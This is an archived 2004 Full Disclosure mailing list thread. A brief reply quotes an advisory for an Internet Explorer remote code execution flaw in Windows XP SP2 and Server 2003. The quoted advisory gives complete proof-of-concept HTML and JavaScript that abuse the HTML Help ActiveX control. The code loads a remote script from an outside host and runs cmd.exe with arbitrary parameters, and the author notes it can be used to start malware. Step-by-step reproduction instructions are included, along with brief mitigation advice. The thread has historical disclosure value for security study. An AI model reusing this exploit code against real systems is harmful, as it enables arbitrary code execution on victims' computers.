Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Windows (XP SP2) Remote code execution withparameters
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 27 Dec 2004 22:13:50 -0800

 On my SP1 system I get a dialog asking if i want to install "hhctrl.ocx"
other than that, nothing happens, no fles dropped, nothing unusual. ( of
course i closed the dialog
for hhctrl.ocx installer ). The file "ntshared.chm" does exist in
C:\windows\help.
I have no "unusual" security settings or 3rd party software blocking
scripts/activex.

hmm?

m.w

----- Original Message ----- 
From: "ShredderSub7 SecExpert" <shreddersub7 () hotmail com>
To: <full-disclosure () lists netsys com>
Sent: Monday, December 27, 2004 4:24 PM
Subject: [Full-disclosure] Windows (XP SP2) Remote code execution
withparameters


PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm

------------------Which systems are vulnerable?--------
Any system running any Microsoft Windows XP edition with Internet Explorer
6
or higher, even with SP2 applied.
Any system running any Microsoft Windows Server 2003 edition with Internet
Explorer 6 or higher.

------------------How does this exploit work?-----------
The problem with Internet Explorer is that it doesn't set any restrictions
on web pages that request opening a Windows Help file, compiled with HTML
Help. Without a restriction, we can (in Internet Explorer) easily command
to
open any local web page stored on a victim's computer, including web pages
that are founded in Windows Help files (with extension .CHM). In this PoC
(Proof of Concept, see below for viewing the PoC), the web page
"alt_url_enterprise_specific.htm" (that is founded in the Windows Help
file
"ntshared.chm") will be opened in the HTML Help program "hh.exe".
Since we now opened a web page stored in a Windows Help file (.CHM), it is
possible (thanks to the exploit) to execute a HTML Help control (in this
case, an ActiveX control) that only fully works in Help files. So in this
PoC, we choosed to launch an ActiveX control for HTML Help. Then, this
ActiveX control will execute any program we want, in this example that's
"cmd.exe".

Thanks to the exploit, it is even possible to add parameters to the
executed
program (here: cmd.exe), so that you can easily start malware out of
"cmd.exe". In this PoC, we added the parameter "/c pause" to the execution
code "cmd.exe", and the result is a DOS Prompt with the text "Press any
key
to continue. . .".

To make it complete, the 2 needed programs (Internet Explorer and HTML
Help)
will be automatically shutted down after the execution is finished. In
this
PoC, HTML Help and Internet Explorer will be automatically closed after
the
execution, without user interaction.

------------------How can you reproduce this PoC?------------------
Create the file "htm.htm" with the following code (please notice that you
may want to modify the full path to the file "htm.txt"):
--------------
&lt;html&gt;<head><title>CMDExe - Windows Exploit - Remote code execution
with parameters - Proof of Concept</title></head><body>
<br>&lt;OBJECT style="display:none" id="locate"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194"&gt;
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"

value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_spec
ific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1"
value='command;javascript:execScript("document.write(\"<script
language=\\\"javascript\\\"

src=\\\"http://www.freewebs.com/shreddersub7/htm.txt\\\"\"+String.fromCharCo
de(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

&lt;script&gt;locate.HHClick();setTimeout("locator.HHClick()",100);setTimeou
t("window.opener=null;window.close()",10000)&lt;/script&gt;</body>&lt;/html&
gt;
--------------

Then create the file "htm.txt" (please notice that you may have to change
the full path to your specified program, in this case "cmd.exe"):
--------------
document.write("<object id=a
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command
value=shortcut><param name=item1 value=',cmd.exe,/c
pause,'></object><object
id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param
name=command
value=close></object><script>a.Click\(\);b.Click\(\)</script>");
--------------

If you want to attack Windows Server 2003 systems, you also need to upload
the "hhctrl.ocx" file (http://www.freewebs.com/shreddersub7/hhctrl.ocx)

--------------How to avoid this exploit...-------------
Since there are no patches from Microsoft available yet, here are some
(temporary?) solutions:  Disable Internet Explorer
or disable Active Scripting (HOW?).
OR Use another browser,for example Mozilla FireFox.

More info (like credits, things that are included etc.) about this exploit
can be found at http://www.freewebs.com/shreddersub7/expl-discuss.htm

Contact: ShredderSub7_at_hotmail.com

_________________________________________________________________
Onze vernieuwde gezondheidsrubriek al gezien? http://www.msn.be/gezondheid

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault